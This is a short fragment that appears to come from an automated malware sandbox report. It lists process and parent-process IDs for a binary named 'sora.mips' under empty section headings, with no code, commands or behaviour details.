Analysis Process: sora.mips PID: 6218, Parent PID: 6213

General

Chronological Activities

Analysis Process: sora.mips PID: 6220, Parent PID: 6218